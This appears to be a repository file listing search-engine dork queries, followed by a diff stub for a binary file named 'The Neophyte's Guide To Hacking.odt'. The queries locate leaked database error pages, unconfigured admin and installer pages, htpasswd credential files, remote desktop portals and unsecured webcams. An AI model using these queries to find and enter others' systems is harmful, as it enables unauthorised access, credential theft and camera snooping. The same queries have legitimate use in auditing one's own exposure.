“Warning: Division by zero in” “on line” -forum
“Warning: mysql_connect(): Access denied for user: *@*” “on line” -help -forum
“Warning: mysql_query()” “invalid query”
“Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL”
“Warning: Supplied argument is not a valid File-Handle resource in”
“Warning:” “failed to open stream: HTTP request failed” “on line”
“Warning:” “SAFE MODE Restriction in effect.” “The s?ri?t whose uid is” “is not allowed to access owned by uid 0 in” “on line”
“SQL Server Driver][SQL Server]Line 1: Incorrect syntax near”
An unexpected token “END-OF-STATEMENT” was found
Coldfusion Error Pages
filetype:asp + “[ODBC SQL”
filetype:asp “Custom Error Message” Category Source
filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”
filetype:php inurl:”logging.php” “Discuz” error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:”Error Message : Error loading required libraries.”
intext:”Warning: Failed opening” “on line” “include_path”
intitle:”Apache Tomcat” “Error Report”
intitle:”Default PLESK Page”
intitle:”Error Occurred While Processing Request” +WHERE (SELECT|INSERT) filetype:cfm
intitle:”Error Occurred” “The error occurred in” filetype:cfm
intitle:”Error using Hypernews” “Server Software”
intitle:”Execution of this s?ri?t not permitted”
intitle:”Under construction” “does not currently have”
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument….
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing “include_path”
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning “error on line” php sablotron
Windows 2000 web server error messages
“ftp://” “www.eastgame.net”
“html allowed” guestbook
: vBulletin Version 1.1.5″
“Select a database to view” intitle:”filemaker pro”
“set up the administrator user” inurl:pivot
“There are no Administrators Accounts” inurl:admin.php -mysql_fetch_row
“Welcome to Administration” “General” “Local Domains” “SMTP Authentication” inurl:admin
“Welcome to Intranet”
“Welcome to PHP-Nuke” congratulations
“Welcome to the Prestige Web-Based Configurator”
“YaBB SE Dev Team”
“you can now password” | “this is a special page only seen by you. your profile visitors” inurl:imchaos
(“Indexed.By”|”Monitored.By”) hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:”index.php” “site=sglinks”
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:”fileman.cgi”
filetype:cgi inurl:”Web_Store.cgi”
filetype:php inurl:vAuthenticate
filetype:pl intitle:”Ultraboard Setup”
Gallery in configuration mode
Hassan Consultings Shopping Cart Version 1.18
intext:”Warning: * am able * write ** configuration file” “includes/configure.php” -
intitle:”Gateway Configuration Menu”
intitle:”Horde :: My Portal” -”[Tickets”
intitle:”Mail Server CMailServer Webmail” “5.2″
intitle:”MvBlog powered”
intitle:”Remote Desktop Web Connection”
intitle:”Samba Web Administration Tool” intext:”Help Workgroup”
intitle:”Terminal Services Web Connection”
intitle:”Uploader Uploader v6″ -pixloads.com
intitle:osCommerce inurl:admin intext:”redistributable under the GNU” intext:”Online Catalog” -demo -site:oscommerce.com
intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
inurl:”/NSearch/AdminServlet”
inurl:”index.php? module=ew_filemanager”
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:”t=”
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp + View Webcam User Accessing
allinurl:control/multiview
inurl:”ViewerFrame?Mode=”
intitle:”WJ-NT104 Main Page”
inurl:netw_tcp.shtml
intitle:”supervisioncam protocol”

BIN
src/Security/Technical Papers and Notes/Docs/The Neophyte's Guide To Hacking.odt Executable file
View File

Binary file not shown.